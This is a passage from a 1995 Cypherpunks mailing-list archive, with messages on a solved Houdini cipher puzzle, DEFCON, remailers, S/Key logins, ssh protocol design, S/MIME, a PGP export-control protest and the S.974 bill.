PRSRVYPRFCTMNVRKPTHSPRCPTSTN > > .................................... > > > > It looks to be something like this to me: > > > > PRESERVE YE PERFECT MEN ?VR? KEEP THIS PERCEPT (or PRECEPT) SATAN > > Close, very close. > > > S a n d y > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Preserve ye perfect men ever keep the precepts ten (As in Commandments!) -----BEGIN PGP SIGNATURE----- Version: 2.6.1 Comment: PGP Signed with PineSign 1.0 iQCVAwUBMBHVtu5wXwthmZO1AQHKgQP+La/QN8uyGFVG9CiUlxENqPtfRINY1Obs FWl/w4DRxzcnwSsf7ET4YgzDjmF1hg584zhOSQFjb1MapOamRX5iBCipsmrcTIXF Xhfb5YW/Sc6nB9qVrLvKpSrr2DZoNtvfTLOWNIiH2lfqOVncY5IEoRQaRDVqDSTX tBR+RhqxroU= =AtOM -----END PGP SIGNATURE----- From skaplin at mirage.skypoint.com Sat Jul 22 22:02:30 1995 From: skaplin at mirage.skypoint.com (Samuel Kaplin) Date: Sat, 22 Jul 95 22:02:30 PDT Subject: Anyone going to DEFCON Message-ID: -----BEGIN PGP SIGNED MESSAGE----- As chance has it, I will be vacationing in Las Vegas July 29 - August 6. Is anyone else planning on going to DEFCON? I won't be attending the whole thing, just selected exerpts, but if there is a get together let me know! Sam -----BEGIN PGP SIGNATURE----- Version: 2.6.1 Comment: PGP Signed with PineSign 1.0 iQCVAwUBMBHXsu5wXwthmZO1AQGG8wQAmGcIPScphLu6EM2nX9zHWWzQZCSk9z0I 8jjFZHmM7DpfFTPZYJEJCnPRG6ClfebhWG8IE76JzVG2L9QLj7EJUZlgxd+cYCEh 2H37WKteqM5AUJeNgXXOVCPvl8W9egduM/En4H+hcuktNfNZ7DIy3LYNMWRcLjwu RLBNKNlUETE= =kRVH -----END PGP SIGNATURE----- From cdaemon at goblin.punk.net Sat Jul 22 22:08:40 1995 From: cdaemon at goblin.punk.net (Checkered Daemon) Date: Sat, 22 Jul 95 22:08:40 PDT Subject: Remailers & local newsgroups Message-ID: <199507230506.WAA07551@goblin.punk.net> Do any of the posting remailers accept the inclusion of regional usenets in their active files so that people can use them to post directly to regional newsgroups? -- The Checkered Daemon cdaemon at goblin.punk.net From chen at intuit.com Sat Jul 22 22:41:57 1995 From: chen at intuit.com (Mark Chen) Date: Sat, 22 Jul 95 22:41:57 PDT Subject: The end of public key cryptography as we know it? In-Reply-To: <199507132009.AA15283@tyrell.net> Message-ID: <9507230539.AA18257@doom.intuit.com> Phil, > An article posted on sci.crypt stated that quantum factoring > is real and that an article was posted in this month's Science > magazine. The author of the post says this would make factoring > a 10 bit number the same time as factoring a 100000000 bit number. > > You can bet your ass and your mother's and grandmother's donatable > organs that if this were possible, then the legislative initiatives > currently underway would not be: they'd just let us use RSA and get > a false sense of security. > > A wonder how long it is before every major government in the world > has one of these. Makes RSA's future kind of moot doesn't it?? > > Well, it would probably "prove" many-worlds right: in which case > we're probably going to be invaded from the one where the Nazis > won WWII, or the libertarians won Shay's Rebellion. Yuk yuk. :> A minor adjustment to your comment: I haven't read the work yet, but if it's based on Shor and Simon, it only "proves" the existence of state superpositions (and perhaps some other mathematical things relating to the construction of unitary transforms) - a fact equally congenial to Many Worlds, Copenhagen, von Neumann, and most other interpretations of quantum mechanics. The only people who would likely be upset by this are the neo-materialists and other hidden-variable fetishists. I'm six hundred messages behind and not likely to catch up soon, so apologies if this has already been covered. - Mark - -- Mark Chen chen at intuit.com 415/329-6913 finger for PGP public key D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D From hal9001 at panix.com Sat Jul 22 22:54:18 1995 From: hal9001 at panix.com (Robert A. Rosenberg) Date: Sat, 22 Jul 95 22:54:18 PDT Subject: big word listing Message-ID: At 02:06 7/22/95, Alex de Joode wrote: >Jim Gillogly sez: > >: Also you should be aware that cracking passwords is passe' these days: >: it's much easier to run an ethernet sniffer and gather them wholesale. >: Every little bit helps, though. > >Is there a "challenge response" type of password/login available >somewhere ? There is the S/Key system. The system sends you an iteration number and you send back the responce that results (by feeding the iteration number into a program that runs on your computer). The other side then iterates what you send once to check against its computed PW. Every challenge counts the number down one step so replay does no good (since the actual PW for the this attempt is what you sent as your response during the prior cycle and there is no way to crack the code even if you know a sequences of responses [you need to know the seed that will generate the PW the challenger is looking for when they do one iteration of the encoding]). From merriman at arn.net Sat Jul 22 23:11:32 1995 From: merriman at arn.net (David K. Merriman) Date: Sat, 22 Jul 95 23:11:32 PDT Subject: ObCrypto Message-ID: <199507230615.BAA05374@arnet.arn.net> >From the Aug/Sep 95 edition of PC Techniques magazine, 'End' feature by Jeff Duntermann except as noted, any typos or other errors are my own. ============================================================================ =========== Zhilchistan on the Hudson Remember central Asian genius Vasily Ovariaidt of Zhilchistan? ("Zhilchistan Moon," December/January 1994.) In my admittedly goofy idea piece, Ovaraidt basically took over the the world by exporting /privacy/ instead of yak hides, and ended up with much of the global economy passing through his hands - minus, of course, his 1 percent service charge. With income tax rates in some Western nations way up in the 70 percent range or worse, there was a /lot/ of reason to work through Zhichistan. Now hey - why leave such a scheme to a tinpot dictator from the steppes? We could do it right here, do it better, and make it stick for all time - and dump the IRS in thr process. Nay, we could /export/ the IRS, and get top dollar for it from backward countries who think they can prosper by punishing the industrious. I'm serious this time. Here's the deal: For maybe the cost of a dozen stealth bombers, the U.S. could create a satellite-based electronic funds transfer system that could literally pass every single financial transaction in the world through its hands every day. Computability isn't the issue. It's simple arithmetic and bandwidth. The quality of the hardware - that is, communications technology - dictates the success of the systems. Nobody does that better than us. On the surface, the purpose of a government-owned central system would be authentification of transactions. (Do you /really/ trust Vassily Ovaraidt?) If Uncle Sam puts his stamp on it, the transaction is probably real - and few will twitch at the .05 percent service charge. This can be valuable even if you're in England and buying a bicycle from the shop across town. Build it, and they will come running from every corner of the Earth - /if/ we can somehow guarantee that we won't snitch to the home boss. The only way to do that is to design absolute anonymity into the system from the ground up, and eliminate our own mechanism - the IRS - for tracking incomes. That's being discussed right now, on both the Democratic and Republican sides of the fence, because it's far from clear that American's hate anything - even poor Bill Clinton - worse than the IRS. No really new technology is involved. Public key certificate authorization can do it; see Schneier's /Advanced Cryptography/ [sic]. Money from all over the world would flood into the system, generating direct benefits from revenues levied on the the transfer, and then indirect benefits of foreign cash invested in a U.S. that doesn't snoop. This system really doesn't favor the rich against the poor. Why? Because it taxes the /velocity/ of money - and the rich's money moves around a lot more than the poor's. By that I mean that a guy who buys a chicken at Safeway pays one tax one time, but a rich guy's money chases all over the world looking for the highest return. Freed from physical constraints and regulation, that money could move from one place to another a couple of times a day, and anonymously drop .05 percent in the government's hands at each transfer. Want to lower your taxes? Leave your moeny in one place for longer periods of time. I would bet that we wouldn't need anything like the 20 percent replacement Federal sales tax now being discussed; we would be taxing the total cash flow of most fo the world's supply of rich guys. In fact, after a year or two, we might not need to levy a federal sales tax on own citizens at all. Sure, it's devilish. The harder other governments squeezed their people, the richer America would grow. Whole governments would fall. Freedom and privacy would be required for a foreign government to compete. In other words, we would save the world. If I live to see that, I don't much care what else I /don't/ live to see. ============================================================================ ========== This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th of the PGP executable. See below for getting YOUR chunk! ------------------ PGP.ZIP Part [015/713] ------------------- M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8 at X'HB_9H#&\X MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3 M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M ------------------------------------------------------------- for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ From attila at primenet.com Sun Jul 23 02:49:32 1995 From: attila at primenet.com (attila) Date: Sun, 23 Jul 95 02:49:32 PDT Subject: DOVE/Red Mercury doom U.S. Super State? In-Reply-To: <9507210919.AA27922@snark.imsi.com> Message-ID: having spent 30+ years in and around the spook show, the first rule of thumb is: "...dont summarily dismiss an obvious falsehood which is persistent from non-related sources," and "...expert more 'disinformation' than information if the subject really does exist." patents were intended to be granted for unique developments --generally without prior art (other than relational). do I believe "red mercury" exists? no, probably not in the form of the popular discussion. --but, consider the components and think plasma.... On Fri, 21 Jul 1995, Perry E. Metzger wrote: > > The Wall Street Journal had a fascinating article on the scams about > "Red Mercury" in the former soviet union -- suffice it to say the > whole thing is bogus. > > .pm > > Gary Jeffers writes: > > DOVE/Red Mercury dooms U.S Super State? =20 > > > > The first part of this post deals with Red Mercury. The > > remainder > > deals generally with cheap weapons of mass destruction and > From skaplin at mirage.skypoint.com Sun Jul 23 03:12:24 1995 From: skaplin at mirage.skypoint.com (Samuel Kaplin) Date: Sun, 23 Jul 95 03:12:24 PDT Subject: HOUDINI ON CRYPTO In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sat, 22 Jul 1995, Samuel Kaplin wrote: > Preserve ye perfect men ever keep the precepts ten > > (As in Commandments!) > Correction: Preserve ye perfect men ever keep these precepts ten The rule for encryption is delete all of the "e"'s which happens to be the only vowel in the sentence. Sam -----BEGIN PGP SIGNATURE----- Version: 2.6.1 Comment: PGP Signed with PineSign 1.0 iQCVAwUBMBIgV+5wXwthmZO1AQFLkAP8CTbaonPUw3UWFIBpmEkYj7mwm5d8jOn6 mETspiij8BTw+w1Pf8N8Jh5j8KeKgkMlPUNmUrkDqQDFMvxFbQuOTd1ypBLAX23h sTzdCiu/0kqyQ3iealqbM8psCJPlerkYZH6K5Q/kUftaZftS5pTZFWa0OcV7a5n/ BLtrzmsbPa0= =27r2 -----END PGP SIGNATURE----- From ylo at cs.hut.fi Sun Jul 23 04:45:41 1995 From: ylo at cs.hut.fi (Tatu Ylonen) Date: Sun, 23 Jul 95 04:45:41 PDT Subject: ssh protocol In-Reply-To: <9507230027.AA10524@venus.pa.dec.com> Message-ID: <199507231145.OAA04620@shadows.cs.hut.fi> People have also suggested using the Photuris protocol that is part of the IP Security work being done at IETF (ftp://www.cnri.reston.va.us/internet-drafts/draft-ietf-ipsec-photuris-02.txt). The basic idea behind the protocol goes roughly like this: 1. Exchange session keys using Diffie-Hellman 2. Each side sends a signature of the Diffie-Hellman exchange (the signature can be with any of a number of algorithms; RSA and Elliptic Curve systems have been defined). If this were adapted to ssh, the protocol would look roughly like this: 1. Exchange session keys using Diffie-Hellman 2. Each side sends a signature of the Diffie-Hellman exchange by its host key 3. RSA and Rhosts authentication requests would include a signature by the requesting key. This would get rid of the server key and the need to regenerate it, because the diffie-hellman exchange already prevents decrypting old conversations. The challenge-dialogs could be avoided (unless they are needed for performance reasons to avoid unnecessary signature computations). One could also eliminate RSA in future and start using some other public key cryptosystem if desired. The Diffie-Hellman patent and the generic public key patent expire in 1997; the RSA-patent does not expire until about year 2000. Anyway, this would be a major change that probably cannot easily be made compatibly. Maybe an incompatible ssh-2.x? Anyway, I don't want to rush into making major changes in the protocol. I would very much like to hear comments on this approach. Tatu From rsnyder at janet.advsys.com Sun Jul 23 05:53:26 1995 From: rsnyder at janet.advsys.com (Bob Snyder) Date: Sun, 23 Jul 95 05:53:26 PDT Subject: S/MIME and the Future of Netscape In-Reply-To: Message-ID: <199507231254.IAA22648@janet.advsys.com> tcmay at sensemedia.net said: > With regard to SSL and Netscape not being open to outside developers, > several leading e-mail outfits, including Qualcomm, Netscape, > Frontier, etc., are working on an interoperable secure e-mail > standard called "Secure/MIME," or "S/MIME." Do you have sources for this information? MOSS is out there at least as a Internet Draft, and possibly further along, and Steve Dorner of Qualcomm, the original author of Eudora, is pretty active in the MIME community and I doubt he would support a second MIME type to do the same thing... Bob From rsnyder at janet.advsys.com Sun Jul 23 06:04:21 1995 From: rsnyder at janet.advsys.com (Bob Snyder) Date: Sun, 23 Jul 95 06:04:21 PDT Subject: Three strikes you're out! for politicians... yeah we wish! In-Reply-To: Message-ID: <199507231305.JAA22804@janet.advsys.com> A non-text attachment was scrubbed... Name: not available Type: application/pgp Size: 14 bytes Desc: not available URL: From sandfort at crl.com Sun Jul 23 06:38:28 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Sun, 23 Jul 95 06:38:28 PDT Subject: HOUDINI ON CRYPTO In-Reply-To: Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, We have a winner! On Sat, 22 Jul 1995, Samuel Kaplin wrote: > > >> PRSRVYPRFCTMNVRKPTHSPRCPTSTN > > > .................................... > Preserve ye perfect men ever keep the precepts ten > > (As in Commandments!) Actually, Samuel missed "these." The correct quote is: Preserve, ye perfect men; ever keep these precepts ten. What Samuel figured out (and Blanc almost got) was that the only "encrytion" was the removal of every letter "e" from the orginal quotation (plus spaces and punctuation). No one figured this out for 200 years, then Houdini got it in whatever time. Now two Cypherpunks zeroed in on it in a day. Congratulations Blanc and Samuel. Most excellent Cypherpunkish kudos. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From us009440 at interramp.com Sun Jul 23 07:54:56 1995 From: us009440 at interramp.com (us009440 at interramp.com) Date: Sun, 23 Jul 95 07:54:56 PDT Subject: Something occured to me Message-ID: -----BEGIN PGP SIGNED MESSAGE----- At 10:54 PM 07/22/95, Lucky Green wrote: > >In article <199507221725.NAA18382 at bb.hks.net>, jburrell at crl.com ("Jason >Burrell") wrote: > >>The pity, of course, is that we can't get Exon for passing around a book >>that he said contained child pornography, since he's immune while he's on >>the Senate floor. > >Wouln't the book become part of the Congressional Record? I'd love to know >what Exon considers child pornography. > It would seem to me that, while the book may become part of the Congressional record, the contents will somehow be redacted. After all, isn't redacting the number one hobby in D.C.? Regards, Fred -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMBJh0VSU4cVs4SvxAQGxPwQApiNjMcn+3V9fA5kDdt3+AduGR2zyzl7X vcIiJBC/yHQas9d26sW6dJw+EFgF1pOhRBvUARGApgRjESU5amrNXfnEtr3kGUAM lHkQ475mnNorQeALUgPvdpFJ6QsZLKBZ3oakKj7C+jlzSO55XCmSIaOwTXvdD3Tj sq9a+KcJD9M= =E16K -----END PGP SIGNATURE----- From um at ulf.mali.sub.org Sun Jul 23 07:59:01 1995 From: um at ulf.mali.sub.org (Ulf Moeller) Date: Sun, 23 Jul 95 07:59:01 PDT Subject: NSA, Random Number Generation, Soviet Codes, Prohibition of Crypto In-Reply-To: <9507121550.AA10682@snark.imsi.com> Message-ID: In article <9507121550.AA10682 at snark.imsi.com> you write: >I've heard that standard 1920s-1950s one time pad generation >techniques involved telling lots of secretaries in the code section to >type numbers at random onto carbon paper forms. No joke. In the German book `Kryptologie' by F.L. Bauer there is a reprint of such a Soviet "random number sheet". -- Ulf M�ller * um at ulf.mali.sub.org * 3umoelle at informatik.uni-hamburg.de PGP key fingerprint: B6 4F 97 28 8F C0 54 C3 A6 10 02 2F B9 31 78 14 "When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl!" From jya at pipeline.com Sun Jul 23 08:12:52 1995 From: jya at pipeline.com (John Young) Date: Sun, 23 Jul 95 08:12:52 PDT Subject: OVR_byt Message-ID: <199507231512.LAA06096@pipe4.nyc.pipeline.com> 7-23-95. NYPaper "True Believers Gather To Honor White Race: Aryans Open Annual Congress in Idaho. Angry outbursts, and an increasing focus on Hitler and Nazi ideals." White supremacists from around the country and Canada gathered here this weekend for the Aryan World Congress, an annual celebration of the white race and anti-Semitism. The congress is being held at a time when Federal lawmakers are pushing to learn more about white supremacists, paramilitary organizations and other fringe right-wing groups following the Oklahoma City bombing. NAZ_raz "The Unending Search for Demons In the American Imagination. Pick a villain. The Jesuits? The arms makers? The U.N.? Or maybe you like Ike." Today's militia members aren't the first to warn that plots are eating at America. There's a familiar ring to much of their fear. A vast array of Cassandras echo through American history. Through the centuries the vlllains of the pieces have shifted -- from Masons to Catholics to Jews, for example -- but the alleged plots also have a lot in common: a foreign (or otherwise alien) connection, a tie to big money, a secret organization more powerful than any state. IFU_knu "Attack of the Cyberthieves, and Other Assaults." Cyberthis. Cyberthat. Could it all be cyberhell? As we venture through the digital gates into information heaven, it might be wise to recall earthly matters. Like theft, for starters. NFO_rip Tri-Lat: OVR_byt From adwestro at ouray.cudenver.edu Sun Jul 23 08:41:05 1995 From: adwestro at ouray.cudenver.edu (Alan Westrope) Date: Sun, 23 Jul 95 08:41:05 PDT Subject: Cyberporn on NPR today In-Reply-To: <9507211927.AA00508@toast> Message-ID: On Fri, 21 Jul 95 15:27:22 EDT, lethin at ai.mit.edu (Rich Lethin) wrote: > Only two callers through, first one should have hung up when he heard > all of his arguments made (better) in the first half hour. Second > caller asked whether the Pynchon mailing list he's on would have to > censor itself if the Exon ammendment passed (seemed a decent point - > succinct too). A few details from caller # 2 himself: ===================================================================== Date: Fri, 21 Jul 1995 17:58:49 -0500 (EST) From: "David L. Pelovitz" Subject: Re: Who's that? To: pynchon-l at sfu.ca > ok, who was on NPR's talk of the nation? > good comments, man...you made the right point in the right way! That was me. And thank you. For those not tuned in, the subject was obscenity/indecency on the internet, and the government's attempts to control it. I asked if we as list members discussing the works of a man who gets obscene and indecent on occassion might be subjected to criminal prosecution by citing the works to make a point here on the net. The man arguing for restrictions suggested that we better make sure this is an adults only board. The man arguing against the Exon amendment pointed out that we may not be able to discuss Pynchon on the net because children might read it, but anyone can buy it at the bookstore. He ended up going back to the Pynchon example to make his point after that. BTW - I am writing an article on the recent censorship movements on the e-zine enterzone. I'll send the URL and publication dates when I have them. David Pelovitz - PELOVTZD at Afcluster.nyu.edu ================================================================== Alan Westrope __________/|-, (_) \|-' 2.6.2 public key: finger / servers PGP 0xB8359639: D6 89 74 03 77 C8 2D 43 7C CA 6D 57 29 25 69 23 From sebaygo at intellinet.com Sun Jul 23 11:08:13 1995 From: sebaygo at intellinet.com (Allen Robinson) Date: Sun, 23 Jul 95 11:08:13 PDT Subject: NOISE: advice on applications Message-ID: I've just recently set up a PPP account, mainly so I could run Netscape. I'm thinking of adding PC Eudora for mail. Any advice on a good newsreader and any other applications it would be handy to have? Thanks. AR [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] "Government, even in its best state, is but a necessary evil; in its worst state, an intolerable one." - Thomas Paine, _Common Sense_ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Allen Robinson..................................sebaygo at intellinet.com PGP public key AD022AA9 fingerprint 5A3BC05B2EC67724 F5664A20AEEAB07A From jeremym at jax.jaxnet.com Sun Jul 23 11:20:18 1995 From: jeremym at jax.jaxnet.com (Jeremy Mineweaser) Date: Sun, 23 Jul 95 11:20:18 PDT Subject: Anyone going to DEFCON Message-ID: <199507231822.OAA11621@jax.jaxnet.com> >As chance has it, I will be vacationing in Las Vegas July 29 - August 6. >Is anyone else planning on going to DEFCON? > >Sam I'm planning to attend all of DefCon III. I, for one, am anxious to meet Bruce Schneier. AFAIK, there will be time for Q&A during the Con, and I'd be happy to ask questions for anyone who won't be able to attend. .jeremy --- Jeremy Mineweaser | GE d(++) H- s+:- g- p1+ au a18 w+ v++ jeremym at jax.jaxnet.com | C++ L++++ P+>+++ L+ 3+ E- N++>+++ K- http://www.jaxnet.com/~jeremym | W++@ M-- V- po+ Y++ t++ 5 j+ R+++ G? tv- Finger for PGP key | b++ D++ B-- e u---(**) h! f+ n---- y? http://dcs.ex.ac.uk/~aba/x.html | *ai*vr*vx*crypto*ITAR*unix*data havens* From adam.philipp at ties.org Sun Jul 23 12:16:06 1995 From: adam.philipp at ties.org (Adam Philipp) Date: Sun, 23 Jul 95 12:16:06 PDT Subject: NOISE: advice on applications Message-ID: >I've just recently set up a PPP account, mainly so I could >run Netscape. I'm thinking of adding PC Eudora for mail. >Any advice on a good newsreader and any other applications >it would be handy to have? Newsreader: Free Agent FTP: WS_FTP Finger: WS_Finger Gopher: WS_Gopher FSP: WinFSP (rarely found) Spell-Check: WinSpell Telnet: Anzio and EWAN IRC: WS_IRC try looking at http://www.acs.oakland.edu/oak/oak.html They have most of these... If you have video capture and a fast connection (28.8k PPP) then look for the various video tools CUSeeMe & WS_IRCv --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\ |PGP key available on my home page|Unauthorized interception violates | | http://www.rosa.com/~adam |federal law (18 USC Section 2700 et| |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|seq.). In any case, PGP encrypted | |SUB ROSA: Confidential, |communications are preferred for | |secret, not for publication. |sensitive materials. | \-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/ From perry at imsi.com Sun Jul 23 12:59:08 1995 From: perry at imsi.com (Perry E. Metzger) Date: Sun, 23 Jul 95 12:59:08 PDT Subject: Netscape the Big Win In-Reply-To: <9507211413.AA25887@sulphur.osf.org> Message-ID: <9507231958.AA00910@snark.imsi.com> Rich Salz writes: > > Well, X.509 for now. The Eastlake-Kaufman DNS Security work > > (draft-ietf-dnssec-secext-04.txt) plus MOSS (draft-ietf-pem-mime-08.txt > > --now proposed standard, awaiting an RFC number) promise to give us > > a non-X.509 certification structure for the Internet. > > I have serious concerns about whether the DNS stuff will really scale. > It's gonna blow out DNS server memory use, and the bigger packets means > a *lot* more TCP (vs UDP) activity. I'm not that worried. HESIOD has already shown that you can afford to store really mongo databases in the DNS, and with caching I suspect the TCP activity isn't going to be over very wide distances for the most part. However, we will likely find out the answers in the next few months. Perry PS Cypherpunks write code. From perry at imsi.com Sun Jul 23 13:08:42 1995 From: perry at imsi.com (Perry E. Metzger) Date: Sun, 23 Jul 95 13:08:42 PDT Subject: It had to happen... In-Reply-To: <199507211714.KAA19175@mycroft.rand.org> Message-ID: <9507232008.AA02294@snark.imsi.com> Jim Gillogly writes: > > > "Perry E. Metzger" writes: > > They [NSA] also have a Fortezza based web security system. One of their guy s > > was discussing some of that here at IETF. > > Are their Fortezza keys escrowed[?] Is the Pope a Catholic? .pm From hal9001 at panix.com Sun Jul 23 13:20:06 1995 From: hal9001 at panix.com (Robert A. Rosenberg) Date: Sun, 23 Jul 95 13:20:06 PDT Subject: HOUDINI ON CRYPTO Message-ID: At 23:53 7/22/95, Samuel Kaplin wrote: >On Sat, 22 Jul 1995, Sandy Sandfort wrote: > >> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ >> SANDY SANDFORT >> . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . >> >> C'punks, >> >> Blanc wrote: >> >> >> PRSRVYPRFCTMNVRKPTHSPRCPTSTN >> > .................................... >> > >> > It looks to be something like this to me: >> > >> > PRESERVE YE PERFECT MEN ?VR? KEEP THIS PERCEPT (or PRECEPT) SATAN >> >> Close, very close. >> >> >> S a n d y >> >> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > >Preserve ye perfect men ever keep the precepts ten > >(As in Commandments!) In that case you gave an incorrect message to decode (by adding vowels) since your expansion/decode had no S between the TH of "THe" and the PRCPTS of "PReCePTS" . From perry at imsi.com Sun Jul 23 14:19:13 1995 From: perry at imsi.com (Perry E. Metzger) Date: Sun, 23 Jul 95 14:19:13 PDT Subject: S/MIME and the Future of Netscape In-Reply-To: <199507231254.IAA22648@janet.advsys.com> Message-ID: <9507232116.AA12258@snark.imsi.com> Bob Snyder writes: > tcmay at sensemedia.net said: > > With regard to SSL and Netscape not being open to outside developers, > > several leading e-mail outfits, including Qualcomm, Netscape, > > Frontier, etc., are working on an interoperable secure e-mail > > standard called "Secure/MIME," or "S/MIME." > > Do you have sources for this information? MOSS is out there at least as a > Internet Draft, In fact, MOSS is now a Proposed Standard. > and possibly further along, and Steve Dorner of Qualcomm, the > original author of Eudora, is pretty active in the MIME community > and I doubt he would support a second MIME type to do the same > thing... I would guess the same. .pm From paul.elliott at hrnowl.lonestar.org Sun Jul 23 14:21:46 1995 From: paul.elliott at hrnowl.lonestar.org (Paul Elliott) Date: Sun, 23 Jul 95 14:21:46 PDT Subject: Why no action alert, coalition opposing S. 974? In-Reply-To: <199507212057.QAA15341@eff.org> Message-ID: <3012a599.flight@flight.hrnowl.lonestar.org> -----BEGIN PGP SIGNED MESSAGE----- OK, OK, OK-- Robbie Westmorland has persuaded me that an action alert before the bill has been "calendared" could be counterproductive. The reason is that until the bill is scheduled to come before a committee, many do not know it exists, and we do not want to tell them! There is a possibility that the bill might be quietly forgotten about, up to the time that it is "calendared". Is there any reason we could not prepare an action alert in advance to be released immediately when/if it is scheduled to come before a subcommittee? - -- Paul Elliott Telephone: 1-713-781-4543 Paul.Elliott at hrnowl.lonestar.org Address: 3987 South Gessner #224 Houston Texas 77063 -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAgUBMBKzH/BUQYbUhJh5AQFOYQQAjZoFcyAAvncyuwG/fS76gdVuQp5ZrF/M sHgRk6sRgOKkl0qLBZKlTD14y00r1LaUXgncdJ81usArj7wV+l38Y10+3YALRtl+ RtyqAdeND4rGLgx940juVbnNzMEC8bq4xQJYHUZSFXSrJmEqw0+CmOuMKPrDn44z 4Dcvhg1n94M= =tibc -----END PGP SIGNATURE----- From lmccarth at cs.umass.edu Sun Jul 23 14:49:11 1995 From: lmccarth at cs.umass.edu (L. McCarthy) Date: Sun, 23 Jul 95 14:49:11 PDT Subject: S.974 Action, & Senate Judiciary Subcommittees Message-ID: <9507232149.AA05185@cs.umass.edu> [please don't cc: me on any replies also directed to cypherpunks at toad] Paul Elliott asked about the subcommittee referral of S.974 in the Senate Judiciary Committee. Although I've never done more in Arizona than loiter in the Phoenix airport, a staffer in Sen. Kyl's office kindly responded to my request for information about Judiciary subcmtes. and action on S.974 (on a Sunday, no less !) Charles Grassley (R-IA) is the primary sponsor of S.974, and Jon Kyl (R-AZ) is the cosponsor. Sen. Grassley chairs the Subcmte. on Administrative Oversight & the Courts, (202) 224-6736. Sen. Leahy (D-VT), who's sponsoring an alternative to the CDT, also sits on this subcommittee. Sen. Kyl sits on the Subcmte. on the Constitution, Federalism & Property Rights, (202) 224-8081. Sen. Feingold (D-CO), who has spoken out against the CDT, is also a member of this subcommittee. Both Grassley & Kyl are on the Immigration Subcmte., (202) 224-6098, but it's hard to see why the bill would get referred there. The Subcmte. on Terrorism, Technology & Government Information, (202) 224-6791, might take an interest in S.974, but neither Grassley nor Kyl sits on it. Leahy belongs to this subcmte. There's no sign in the Congressional Quarterly synopsis of any subcommittee referral of S.974 thus far: Forwarded from info at kyl.senate.gov: > 1 of 1 items CQ's WASHINGTON ALERT 07/23/95 > > *** FULL REPORT -- DIGEST, LEGISLATIVE ACTION, COSPONSORS, SPEECHES *** > > MEASURE: S974 > > SPONSOR: Grassley (R-IA) > > BRIEF TITLE: Anti-Electronic Racketeering Act of 1995. > > OFFICIAL TITLE: A bill to prohibit certain acts involving the use of > computers in the furtherance of crimes, and for other > purposes. > > INTRODUCED: 06/27/95 > > COSPONSORS: 1 (Dems: 0 Reps: 1 Ind: 0) > > COMMITTEES: Senate Judiciary > > SHORT TITLE AS INTRODUCED: > Anti-Electronic Racketerring [sic] Act of 1995 > > CRS SUBJECT INDEX TERMS: > Crime and criminals > Actions and defenses > Civil liberties > Computer crimes > Computer networks > Computer software > Criminal justice > Damages > Data banks > Destruction of property > Electronic surveillance > Evidence (Law) > Jurisdiction > Law > Legal fees > Money laundering > Organized crime > Right of privacy > Searches and seizures > Technology > Wiretapping > > > LEGISLATIVE ACTION: > > 06/27/95 Referred to Committee on the Judiciary (Text of bill > appears on pgs. S9180-S9181 of the June 27, 1995, > Congressional Record) (CR p. S9174) > > 06/27/95 GRASSLEY, R-Iowa, Senate speech: Introduces the > Anti-Electronic Racketeering Act of 1995. (Text of > bill) (CR p. S9180-S9181) > > 07/20/95 Cosponsor(s) added: 1 > Kyl (R-AZ) From lmccarth at cs.umass.edu Sun Jul 23 15:14:55 1995 From: lmccarth at cs.umass.edu (L. McCarthy) Date: Sun, 23 Jul 95 15:14:55 PDT Subject: Remailers & local newsgroups In-Reply-To: <199507230506.WAA07551@goblin.punk.net> Message-ID: <9507232214.AA05350@cs.umass.edu> [cc:ed to remailer-operators; I suggest replies to the latter] The Checkered Daemon writes: > Do any of the posting remailers accept the inclusion of regional usenets > in their active files so that people can use them to post directly to > regional newsgroups? Last I heard, Julf generally honors requests for penet.fi to carry additional groups. If you don't know the contact address of a particular remailer operator, remailer-operators at c2.org is probably the best place to try to get in touch with one. (Most c'punk remailers mention an admin/complaints address in the headers of their remailed messages.) Many cpunk/mix remailers these days allow newsgroup posting only via mail2news gateways, so you may need to convince the operator of one of those to add a group. In itself, this doesn't necessarily solve your problem, due to the nature of Usenet news propagation. Briefly, if a site "upstream" of the posting site in the propagation tree doesn't carry a certain group, then articles posted only to that group won't make it out to much of the net. The most popular solution to this predicament is "piggybacking" -- crossposting an article into a well- propagated group so that it makes it across holes in the lesser-carried group's propagation. The *.test groups are often used for this, although you'll irritate plenty of people if you don't set the Followup-To: on your article out of the test group. -Futplex "Jeux sans frontieres" From rah at shipwright.com Sun Jul 23 15:36:17 1995 From: rah at shipwright.com (Robert Hettinga) Date: Sun, 23 Jul 95 15:36:17 PDT Subject: Netscape the Big Win(dows) Message-ID: -----BEGIN PGP SIGNED MESSAGE----- At 12:32 PM 7/21/95, Timothy C. May wrote: > >No, I don't use any of the "-works" apps, and I think the 